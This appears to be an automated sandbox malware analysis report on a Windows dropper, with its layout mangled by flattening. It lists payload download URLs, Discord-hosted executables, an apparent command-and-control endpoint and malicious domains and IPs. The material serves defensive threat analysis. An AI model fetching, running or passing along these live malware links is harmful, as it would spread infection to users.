https://cdn.discordapp.com/ones | yevbZfdCqR.exe, 00000001.00000003.646781489.0000000005AEC000.00000004.00000001.sdmp | false | | high
https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmp | yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmp | false | | high
http://136.144.41.133/WW/file2.exeC: | yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmp | false | Avira URL Cloud: safe |
                                                                                unknown
                                                                                https://cdn.discordapp.com:80/attachments/849802777433341954/851833670733266955/jooyu.exeEyevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.749546069.0000000001767000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.762651652.0000000002041000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    https://cdn.discordapp.com/attachments/835840016650600461/835848109048987689/004file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpfalse
                                                                                      high
                                                                                      http://136.144.41.133/WW/file7.exeumentsN13eHI1fs1RwfU6rt0L4y8dk.exeyevbZfdCqR.exe, 00000001.00000003.650285790.0000000004F72000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://turnitin.com/robot/crawlerinfo.html)couldnKyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://136.144.41.133/yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/49k3IgkO4JO.js?_nc_x=Ij3Wp8lg5KzLPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.browzar.com/start/?v=2000#EBrowzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://2makestorage.comidna:KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://136.144.41.152/KByevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            http://marsdevelopmentsftwr.com/data/data.7zgDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmptrue
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            http://www.sysinternals.comopen/?ICONSHELLRUNASAboutUsage/raw/netonlyRunAsInvoker__COMPAT_LAYERcmdfile4.exe, 00000019.00000000.703183273.000000000040D000.00000002.00020000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.cssmd8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://www.browzar.com/start/?v=2000tagead/js/adsbygoogle.jsbrowzar.com;iBrowzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpfalse
                                                                                              high
                                                                                              https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1eLMEMBrowzar.exe, 0000001D.00000002.1012921761.0000000000804000.00000004.00000020.sdmpfalse
                                                                                                high
                                                                                                https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://136.144.41.133/WW/file8.exeC:yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmptrue
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://cdn.discordapp.com:80/attachments/855697945679888404/856207959917985862/file3s.bmpyevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5md8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://icanhazip.com5https://wtfismyip.com/textChttp://bot.whatismyipaddress.com/3http://checkip.dy9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://136.144.41.133/WW/file1.exeC:yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://cps.letsencrypt.org0yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266emd8_8eus.exe, 00000023.00000003.786028152.0000000003EBC000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/css/optanon.cmd8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000003.723524402.0000000000AFD000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000006.00000002.754891811.0000000003F75000.00000004.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.963209956.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000003.957981451.0000000000B4B000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://136.144.41.152/base/api/getData.phpMyevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0syevbZfdCqR.exe, 00000001.00000003.647771339.0000000005DE1000.00000004.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000003.704147126.00000000048E0000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://136.144.41.133/WW/file1.exe1yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://optanon.blob.core.windows.net/skins/4.1.0/default_flat_top_two_button_black/v2/images/cookiemd8_8eus.exe, 00000023.00000003.942394031.0000000003FA0000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://pki.goog/repository/0Browzar.exe, 0000001D.00000003.736937101.0000000005D2C000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://www.msn.com/md8_8eus.exe, 00000023.00000003.932319523.0000000003F58000.00000004.00000001.sdmpfalse
                                                                                                          high
                                                                                                          https://cdn.discordapp.com/attachments/849802777433341954/849807598056112138/Setup2.exeyevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753170686.0000000004F04000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.discordapp.com/attachments/849802777433341954/851833670733266955/jooyu.exe%2LMEMBrowzar.exe, 0000001D.00000002.1025136728.0000000000861000.00000004.00000020.sdmpfalse
                                                                                                              high
                                                                                                              http://fairsence.com/campaign/?type=err&source=campaign1&pinf1=gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965220309.000000000069A000.00000004.00000020.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://cdn.discordapp.com:80/attachments/856079061931786250/856079337548021790/app.bmpdyevbZfdCqR.exe, 00000001.00000002.753069544.0000000004EB2000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://https://_bad_pdb_file.pdbKyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                low
                                                                                                                http://www.msn.com/md8_8eus.exe, 00000023.00000003.942570553.0000000003F90000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://136.144.41.152/base/api/getData.phpFyevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://cdn.discordapp.com:80/attachments/855697945679888404/856835788548603904/file3.bmpyevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://nsis.sf.net/NSIS_ErroryevbZfdCqR.exe, 00000001.00000003.645849368.0000000004F52000.00000004.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.964961247.000000000040B000.00000002.00020000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressingYX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.967742961.0000000002D71000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://sndvoices.comhttps://spolaect.infoimage:KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmptrue
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://stats.g.doubleclick.net/j/collect?Browzar.exe, 0000001D.00000003.755686274.00000000090F5000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.736239537.0000000008D4D000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000003.737737782.000000000261F000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://136.144.41.133/WW/file6.exehttp://136.144.41.133/WW/file7.exeyevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://www.tumblr.com/policy/en/privac)oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://136.144.41.133/WW/file7.exeC:yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://136.144.41.152/base/api/getData.phpqyevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.browzar.com/start/?v=2000cs.com/ga.jsBrowzar.exe, 0000001D.00000002.1014757833.0000000000825000.00000004.00000020.sdmpfalse
                                                                                                                              high
                                                                                                                              http://136.144.41.152/base/api/getData.phpsyevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://www.browzar.com/start/images/browzar-logo.png#nBrowzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpfalse
                                                                                                                                high
                                                                                                                                https://blockchain.infoindexKyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.browzar.com/start/?v=2000http://www.browzar.com/start/?v=2000Browzar.exe, 0000001D.00000003.763962133.00000000091E0000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://crl.pki.goog/gsr2/gsr2.crl0?md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://pki.goog/gsr2/GTSGIAG3.crt0)md8_8eus.exe, 00000023.00000003.942943627.0000000003FB0000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
URL | Source | Malicious | Reputation
https://static.xx.fbcdn.net/rsrc.php/v3/ym/l/0 | LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000003.762195640.0000000001766000.00000004.00000001.sdmp, jooyu.exe, 0000001A.00000003.785194804.0000000002074000.00000004.00000001.sdmp | false | high
https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNQP1yCl9r5iywZTFTjpazv-DURVxDidzMfrF | md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmp | false | high
https://googleads.g.doubleclick.net/adsid/google/ui?gadsid=AORoGNSrZsXAj6n_sYvivJecwrpYgMhb9ihVGAlz2 | md8_8eus.exe, 00000023.00000003.921052595.0000000003E1A000.00000004.00000001.sdmp | false | high
https://cdn.discordapp.com/attachments/849802777433341954/857202035422003220/BrowzarBrowser_j11.exex | yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp | false | high
http://www.browzar.com/start/?v=2000#~ | Browzar.exe, 0000001D.00000003.736533690.0000000005D04000.00000004.00000001.sdmp | false | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
136.144.41.152 | unknown | Netherlands | 49981 | WORLDSTREAMNL | true
185.20.227.194 | unknown | Russian Federation | 197695 | AS-REGRU | false
136.144.41.133 | unknown | Netherlands | 49981 | WORLDSTREAMNL | false
159.69.20.131 | unknown | Germany | 24940 | HETZNER-ASDE | false
88.218.92.148 | uyg5wye.2ihsfa.com | Netherlands | 18978 | ENZUINC-US | false
212.80.219.75 | freeprivacytoolsforyou.xyz | Lithuania | 50673 | SERVERIUS-ASNL | true
157.240.17.35 | star-mini.c10r.facebook.com | United States | 32934 | FACEBOOKUS | false
138.68.187.227 | g-partners.top | United States | 14061 | DIGITALOCEAN-ASNUS | true
104.21.65.45 | jom.diregame.live | United States | 13335 | CLOUDFLARENETUS | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
74.114.154.22 | sergeevih43.tumblr.com | Canada | 2635 | AUTOMATTICUS | false
104.21.59.252 | d.dirdgame.live | United States | 13335 | CLOUDFLARENETUS | false
89.221.213.3 | nicepricingsaleregistration.com | Czech Republic | 197019 | WEDOSCZ | true
101.36.107.74 | unknown | China | 135377 | UHGL-AS-APUCloudHKHoldingsGroupLimitedHK | false
139.59.176.201 | www.browzar.com | Singapore | 14061 | DIGITALOCEAN-ASNUS | false
88.99.66.31 | iplogger.org | Germany | 24940 | HETZNER-ASDE | false
162.159.134.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

Private IPs

IP
192.168.2.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 439281
Start date: 23.06.2021
Start time: 22:21:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 55s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: yevbZfdCqR.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 41
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@68/339@28/18
EGA Information: Failed
HDC Information:
• Successful, ratio: 10.5% (good quality ratio 10%)
• Quality average: 83.9%
• Quality standard deviation: 25.2%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Max analysis timeout: 220s exceeded, the analysis took too long
• TCP packets have been reduced to 100
• Created / dropped files have been reduced to 100
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 204.79.197.200, 13.107.21.200, 52.255.188.83, 13.64.90.137, 92.122.145.220, 142.250.184.234, 142.250.185.98, 142.250.186.46, 142.250.186.142, 173.222.108.210, 173.222.108.226, 40.88.32.150, 216.58.212.174
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cse.google.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.google-analytics.com, www.bing.com, skypedataprdcolwus17.cloudapp.net, www-google-analytics.l.google.com, dual-a-0001.a-msedge.net, ajax.googleapis.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, pagead2.googlesyndication.com, skypedataprdcoleus17.cloudapp.net, script.google.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing behavior information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Report size exceeded the maximum capacity and may be missing network information
• Report size getting too big, too many NtAllocateVirtualMemory calls found
• Report size getting too big, too many NtDeviceIoControlFile calls found
• Report size getting too big, too many NtOpenFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryAttributesFile calls found
• Report size getting too big, too many NtQueryValueKey calls found
Simulations

Time | Type | Description
22:22:31 | API Interceptor | 1x Sleep call for process: awTgWtFfNpBsevxQFHzT446w.exe modified
22:22:38 | API Interceptor | 3x Sleep call for process: LPBuRcBvc7urPUzoi5RqTFtn.exe modified
22:22:55 | API Interceptor | 1x Sleep call for process: Browzar.exe modified
22:22:57 | API Interceptor | 1x Sleep call for process: gUlDp5No64Xfcgfbo3IlvG0y.exe modified
22:22:58 | API Interceptor | 2x Sleep call for process: jooyu.exe modified
22:23:05 | API Interceptor | 2x Sleep call for process: md8_8eus.exe modified
22:23:06 | API Interceptor | 1x Sleep call for process: NVdpapR9v21C.exe modified
22:23:19 | API Interceptor | 2x Sleep call for process: BqbASL8ovE3o_gRiKrvwENXN.exe modified
Joe Sandbox View / Context: IPs

Match | Associated Sample Name / URL | Detection | Context
136.144.41.152 | AyerJxT4OR.exe | malicious | 136.144.41.152/base/api/getData.php
185.20.227.194 | AyerJxT4OR.exe | malicious | 185.20.227.194/install.exe
Joe Sandbox View / Context: Domains

Match | Associated Sample Name / URL | Detection | Context
nicepricingsaleregistration.com | uphmioXDt5.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | EEwiLwdoMb.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | x5vhRkJPYg.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | U461m2jlCR.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | Ug9mHvLIyr.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | arnatic_6.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | 5QsVJCRQdn.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | AyerJxT4OR.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | cx7ESGLtOL.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | zsaIpokeUX.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | EdQZWKJ8hC.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | cqfoBcirKS.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | xIJ2Rh8eij.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | 42sB3Upj67.exe | malicious | 89.221.213.3
nicepricingsaleregistration.com | VvaBHdJoGY.exe | malicious | 89.221.213.3
jom.diregame.live | uphmioXDt5.exe | malicious | 172.67.158.82
jom.diregame.live | EEwiLwdoMb.exe | malicious | 172.67.158.82
jom.diregame.live | x5vhRkJPYg.exe | malicious | 104.21.65.45
jom.diregame.live | U461m2jlCR.exe | malicious | 104.21.65.45
jom.diregame.live | Ug9mHvLIyr.exe | malicious | 104.21.65.45
jom.diregame.live | arnatic_6.exe | malicious | 104.21.65.45
jom.diregame.live | 5QsVJCRQdn.exe | malicious | 104.21.65.45
jom.diregame.live | AyerJxT4OR.exe | malicious | 104.21.65.45
jom.diregame.live | cx7ESGLtOL.exe | malicious | 104.21.65.45
jom.diregame.live | zsaIpokeUX.exe | malicious | 172.67.158.82
jom.diregame.live | EdQZWKJ8hC.exe | malicious | 172.67.158.82
jom.diregame.live | cqfoBcirKS.exe | malicious | 172.67.158.82
jom.diregame.live | xIJ2Rh8eij.exe | malicious |
                                                                                                                                            • 104.21.65.45
                                                                                                                                            kctD8brhzU.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.158.82
                                                                                                                                            ccbf1853c703609eda36bc07ab8eb2faf692153b56ecf.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.158.82
                                                                                                                                            42sB3Upj67.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.158.82
                                                                                                                                            VvaBHdJoGY.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.158.82
                                                                                                                                            teX5sUCWAg.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.158.82
                                                                                                                                            teX5sUCWAg.exeGet hashmaliciousBrowse
                                                                                                                                            • 104.21.65.45
                                                                                                                                            yPbGfVkUrS.exeGet hashmaliciousBrowse
                                                                                                                                            • 172.67.158.82
| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| AS-REGRU | uphmioXDt5.exe | malicious | 185.20.227.194 |
| | EEwiLwdoMb.exe | malicious | 185.20.227.194 |
| | 90lh34776t.exe | malicious | 194.67.90.216 |
| | x5vhRkJPYg.exe | malicious | 185.20.227.194 |
| | 1qjC7y0ipN.exe | malicious | 194.67.78.86 |
| | U461m2jlCR.exe | malicious | 185.20.227.194 |
| | Ug9mHvLIyr.exe | malicious | 185.20.227.194 |
| | arnatic_6.exe | malicious | 185.20.227.194 |
| | bCCpGPwiQ7.exe | malicious | 185.20.227.194 |
| | wqmOhNVrdP.exe | malicious | 185.20.227.194 |
| | 5QsVJCRQdn.exe | malicious | 185.20.227.194 |
| | AyerJxT4OR.exe | malicious | 185.20.227.194 |
| | cx7ESGLtOL.exe | malicious | 185.20.227.194 |
| | zsaIpokeUX.exe | malicious | 185.20.227.194 |
| | Pods | malicious | 194.87.186.66 |
| | Pods | malicious | 194.87.186.66 |
| | dqVPlpmWYt.exe | malicious | 31.31.198.173 |
| | update.exe | malicious | 194.58.112.174 |
| | 4567.exe | malicious | 194.58.112.174 |
| | triage_dropped_file.dll | malicious | 91.224.22.15 |
| WORLDSTREAMNL | pVOLEckzk1.exe | malicious | 136.144.41.46 |
| | uphmioXDt5.exe | malicious | 136.144.41.133 |
| | uupate.exe | malicious | 136.144.41.4 |
| | microsoft-II.jpeg.exe | malicious | 136.144.41.4 |
| | EEwiLwdoMb.exe | malicious | 136.144.41.133 |
| | x5vhRkJPYg.exe | malicious | 136.144.41.133 |
| | U461m2jlCR.exe | malicious | 136.144.41.133 |
| | Ug9mHvLIyr.exe | malicious | 136.144.41.133 |
| | arnatic_6.exe | malicious | 136.144.41.133 |
| | bCCpGPwiQ7.exe | malicious | 136.144.41.133 |
| | wqmOhNVrdP.exe | malicious | 136.144.41.133 |
| | 5QsVJCRQdn.exe | malicious | 136.144.41.133 |
| | AyerJxT4OR.exe | malicious | 136.144.41.133 |
| | cx7ESGLtOL.exe | malicious | 136.144.41.133 |
| | zsaIpokeUX.exe | malicious | 136.144.41.133 |
| | EdQZWKJ8hC.exe | malicious | 136.144.41.133 |
| | NriBW9xBjc.exe | malicious | 136.144.41.115 |
| | cqfoBcirKS.exe | malicious | 136.144.41.133 |
| | xIJ2Rh8eij.exe | malicious | 136.144.41.133 |
| | INVOICE.scr.exe | malicious | 136.144.41.246 |
| Match | Associated Sample Name / URL | Detection | Context |
|---|---|---|---|
| ce5f3254611a8c095a3d821d44539877 | instagrampassword_setup.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | Wire Info.docx | malicious | 157.240.17.35, 88.99.66.31 |
| | buhy005VdX.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | ghXWqV6o1J.docx | malicious | 157.240.17.35, 88.99.66.31 |
| | raccon.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | raccon.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | infostati2.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | a400f0e9a47050eea2eae8ca120f3704#U007e.html | malicious | 157.240.17.35, 88.99.66.31 |
| | L3UdpV3hqe.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | kum7Tat25I.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | Payment Ref 24,845.docx | malicious | 157.240.17.35, 88.99.66.31 |
| | wbEjg6mZB8.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | customer1.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | customer2.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | bsLo9v48Ed.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | s4XPHwD3pn.exe | malicious | 157.240.17.35, 88.99.66.31 |
| | TT_COPY.MT103.SWIFT.docx | malicious | 157.240.17.35, 88.99.66.31 |
| | MT103.docx | malicious | 157.240.17.35, 88.99.66.31 |
| | SOAOG31JdG.dll | malicious | 157.240.17.35, 88.99.66.31 |
| | 8RHjejryGU.exe | malicious | 157.240.17.35, 88.99.66.31 |
| 37f463bf4616ecd445d4a1937da06e19 | 6D03.exe | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | 9i70IpVwXU.exe | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | update2.zip.exe | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | Build.exe | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | plan-277786552.xlsb | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | Declaration-Of-Independence-Crossword-Puzzle-Answers-Quizlet.exe | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | instagrampassword_setup.exe | malicious | 74.114.154.22, 104.21.59.252, 104.21.65.45, 162.159.134.233 |
| | bmaphis@cardinaltek.com_16465506 AMDocAtt.HTML | malicious | |
                                                                                                                                            • 74.114.154.22
